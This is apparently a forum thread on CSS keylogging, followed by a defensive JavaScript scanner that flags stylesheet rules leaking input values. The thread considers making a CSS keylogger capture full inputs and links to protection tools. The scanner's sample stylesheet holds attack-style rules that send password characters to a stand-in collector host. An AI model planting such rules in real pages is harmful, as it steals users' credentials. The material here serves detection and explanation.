
Following the link in your readme to davywtf's twitter post, I saw this comment by dade:

>I remember last year, and probably the year before that, and probably the year before that still, people continually rediscover CSS keylogging. Glad to see something more interesting this time. Good work.

Following up on this, I found an article[0] claiming that it isn't really an issue since a pure CSS keylogger can only catch one character. It seems to me like your method of pseudo-refreshing the page by making old elements hidden and delivering new elements to replace them might be able to overcome this impediment, which would make your on-screen keyboard unnecessary; if I understand correctly, you could just keep capturing whatever the user types in a field, and deliver a new field that already has whatever they've typed already as the default value with autofocus on. Do I understand correctly? Is there something I'm missing, like autofocus not playing well with continuous chunks of data being delivered? I'm not saying you should put in the additional effort to do this for your beautiful-horrible-clusterfuck of a project, I'm just curious about the feasibility and thought you might already know the answer.

[0]: https://www.bram.us/2018/02/21/css-keylogger-and-why-you-sho...




> Following up on this, I found an article[0] claiming that it isn't really an issue since a pure CSS keylogger can only catch one character.

That reminds me of:

• Stealing Data With CSS: Attack and Defense https://www.mike-gualtieri.com/posts/stealing-data-with-css-...

• CSS Exfil Vulnerability Tester https://www.mike-gualtieri.com/css-exfil-vulnerability-teste...

• CSS Exfil Protection (Firefox) https://addons.mozilla.org/en-US/firefox/addon/css-exfil-pro...

• CSS Exfil Protection (Chrome) https://chrome.google.com/webstore/detail/css-exfil-protecti...

Never really got much coverage. It's not mitigated by uBlock or uMatrix (unless you deny all CSS).
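A defender-side check on the theme of the CSS Exfil links above, added here as an example and not taken from the thread or from those projects: it scans stylesheet text for rules that pair a `value` attribute selector with a `url()` that triggers a request. The function name, the sample stylesheet and the `.example` hosts are constructed for illustration.

```javascript
// Added example: flag CSS rules that pair a value-attribute selector with a fetching url().
// All names, the sample stylesheet and the .example hosts are constructed for illustration.
const VALUE_SELECTOR = /\[\s*value\s*[\^$*|~]?=/i;      // [value=..], [value^=..], [value$=..], ...
const URL_FN = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;     // url(x), url("x"), url('x')

function findValueExfilRules(css, pageUrl) {
  const text = css.replace(/\/\*[\s\S]*?\*\//g, '');    // drop comments first
  const pageOrigin = new URL(pageUrl).origin;
  const rule = /([^{}]+)\{([^{}]*)\}/g;                 // innermost "selector { body }" blocks
  const findings = [];
  let m;
  while ((m = rule.exec(text)) !== null) {
    const selector = m[1].trim();
    if (!VALUE_SELECTOR.test(selector)) continue;       // selector does not key on the value attribute
    const requests = [];
    for (const u of m[2].matchAll(URL_FN)) {
      let target;
      try { target = new URL(u[2].trim(), pageUrl); } catch { continue; }
      if (target.protocol === 'data:') continue;        // inline data, no network request
      requests.push({ url: target.href, crossOrigin: target.origin !== pageOrigin });
    }
    if (requests.length) findings.push({ selector, requests });
  }
  return findings;
}

// Constructed sample stylesheet: two rules that should be flagged, three that should not.
const SAMPLE_CSS = `
/* constructed sample */
input[type="password"][value$="a"] { background-image: url("https://collector.example/a"); }
@media screen { input[value^="b"] { background: url(//collector.example/b) } }
input[value="x"] { background: url(data:image/png;base64,AAAA); }
.logo { background: url("https://cdn.example/logo.png"); }
input[type="text"] { border: 1px solid red; }
`;

const report = findValueExfilRules(SAMPLE_CSS, 'https://app.example/login');
for (const f of report) {
  console.log(f.selector, '->', f.requests.map(r => r.url).join(', '));
}
```

This is a text heuristic over a single stylesheet; it does not follow `@import` or inspect styles applied at runtime.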



